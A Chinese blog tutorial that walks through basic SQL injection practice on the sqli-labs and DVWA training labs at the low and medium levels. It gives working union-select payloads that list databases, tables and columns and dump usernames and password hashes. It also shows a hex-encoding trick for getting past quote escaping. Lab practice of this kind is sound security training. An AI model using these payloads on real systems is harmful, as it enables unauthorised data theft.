首页
所有分类
TAGS
文字工具 EMOJI BIBLE
数据库 MySQL

MySQL注入基础练习

Posted in MySQL onMay 30, 2021

以sqli-labs-master作为练习

初始:简单获取基础内容

第一步,使用拼接的方式决定注入类型

MySQL注入基础练习

第二部,使用order by确定有表单有几列值

order by根据指定的列对结果集进行排序

MySQL注入基础练习

第三步,使用union select 来找到内容,获取想要得到内容

union select :联合查询

MySQL注入基础练习

进阶,通过mysql注入获取表单内容,托库;

第一步:通过数据库语句进行搜索,首先确定数据库

MySQL注入基础练习

第二部:确定数据库后,爆出它的表;

MySQL注入基础练习

第三步:确定表以后,可根据实际需求爆表,这里以users举例,进行爆字段

MySQL注入基础练习

第四部:确定字段后,我们就可以拖库;

MySQL注入基础练习

DVWA训练基础 low级别

1.参照上文确定当前库

1' union select (select database()),2 -- -

MySQL注入基础练习

2.确定库后,爆表

1' union select (select group_concat(table_name) from information_schema.tables where table_schema = 'dvwa'),2 -- -

MySQL注入基础练习

3.确定表后,爆字段

1' union select (select group_concat(column_name) from information_schema.columns where table_schema = 'dvwa' and table_name='users'),2 -- -

MySQL注入基础练习

4.确定字段后,进行拖库

1' union select (select group_concat(concat_ws(0x7e,user,password))from users),2 -- -

MySQL注入基础练习

级别Medium

与low级别不同,没有输入框,只有选择项,所以需要借助bp工具

MySQL注入基础练习

1.打开代理使用bp进行抓包并发送到Repeater模块进行反复验证

MySQL注入基础练习

2.其余步骤参考上文:暴库

MySQL注入基础练习

爆表

ps:因为后台强制转译的问题,要注意避免单引号

MySQL注入基础练习

爆字段

同爆表,因为转译的问题,要注意避免引号,可使用编译规避;

1 union  select 1,(select group_concat(column_name) from information_schema.columns where table_schema = (select database()) and table_name=0x7573657273)

MySQL注入基础练习

拖库

MySQL注入基础练习

MySQL注入基础练习

- Author -

纪迁辰

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

MySQL 相关文章推荐
MySQL 使用事件(Events)完成计划任务
May 24 MySQL
Mysql systemctl start mysqld报错的问题解决
Jun 03 MySQL
MySQL 发生同步延迟时Seconds_Behind_Master还为0的原因
Jun 21 MySQL
MySQL中IF()、IFNULL()、NULLIF()、ISNULL()函数的使用详解
Jun 26 MySQL
MySQL系列之十一 日志记录
Jul 02 MySQL
MySQL数据库10秒内插入百万条数据的实现
Nov 01 MySQL
mysql的数据压缩性能对比详情
Nov 07 MySQL
分享几个简单MySQL优化小妙招
Mar 31 MySQL
进阶篇之linux环境下安装MySQL数据库
Apr 09 MySQL
优化Mysql查询的示例
Apr 26 MySQL
mysql字段为NULL索引是否会失效实例详解
May 30 MySQL
MYSQL中文乱码问题的解决方案
Jun 14 MySQL
解决Navicat for MySQL 连接 MySQL 报2005错误的问题
MYSQL(电话号码,身份证)数据脱敏的实现
May 28 #MySQL
MySql开发之自动同步表结构
mysql升级到5.7时,wordpress导数据报错1067的问题
May 27 #MySQL
解决Navicat for Mysql连接报错1251的问题(连接失败)
Navicat for MySQL的使用教程详解
MySQL Router实现MySQL的读写分离的方法
接收函(23) 计划书(118) 教学反思(909) 制度(225) 证明书(326) 答谢词(97) 方案(1080) 评语(336) 感言(394) 寄语(276)
You might like
php静态文件生成类实例分析
2015/01/03 PHP
支持中文的PHP按字符串长度分割成数组代码
2015/05/17 PHP
PHP简单的MVC框架实现方法
2015/12/01 PHP
Yii配置与使用memcached缓存的方法
2016/07/13 PHP
PHP设计模式(五)适配器模式Adapter实例详解【结构型】
2020/05/02 PHP
JavaScript的面向对象(一)
2006/11/09 Javascript
jQuery 获取URL的GET参数值的小例子
2013/04/18 Javascript
jQuery函数的等价原生函数代码示例
2013/05/27 Javascript
如何使Chrome控制台支持多行js模式——意外发现
2013/06/13 Javascript
javascript history对象(历史记录)使用方法(实现浏览器前进后退)
2014/01/07 Javascript
Javascript和Java获取各种form表单信息的简单实例
2014/02/14 Javascript
js 弹出新页面避免被浏览器、ad拦截的一种新方法
2014/04/30 Javascript
轻松创建nodejs服务器(6):作出响应
2014/12/18 NodeJs
使用VS开发 Node.js指南
2015/01/06 Javascript
javascript实现复选框全选或反选
2017/02/04 Javascript
修改Nodejs内置的npm默认配置路径方法
2018/05/13 NodeJs
细说webpack6 Babel的使用详解
2019/09/26 Javascript
js异步接口并发数量控制的方法示例
2020/11/22 Javascript
[01:10]3.19DOTA2发布会 三代刀塔人第一代
2014/03/25 DOTA
python编写暴力破解FTP密码小工具
2014/11/19 Python
收集的几个Python小技巧分享
2014/11/22 Python
python网络编程之数据传输UDP实例分析
2015/05/20 Python
python图像处理之反色实现方法
2015/05/30 Python
Python Paramiko模块的使用实际案例
2018/02/01 Python
设置python3为默认python的方法
2018/10/31 Python
pyqt5使用按钮进行界面的跳转方法
2019/06/19 Python
Python3批量生成带logo的二维码方法
2019/06/24 Python
tensorboard 可以显示graph,却不能显示scalar的解决方式
2020/02/15 Python
Numpy 多维数据数组的实现
2020/06/18 Python
HTML5 Canvas的常用线条属性值总结
2016/03/17 HTML / CSS
公司中秋节活动方案
2014/02/12 职场文书
2014年巴西世界杯口号
2014/06/05 职场文书
租房协议书样本
2014/08/20 职场文书
2014年学生资助工作总结
2014/12/18 职场文书
三好学生评语大全
2014/12/29 职场文书
《葡萄沟》教学反思
2016/02/23 职场文书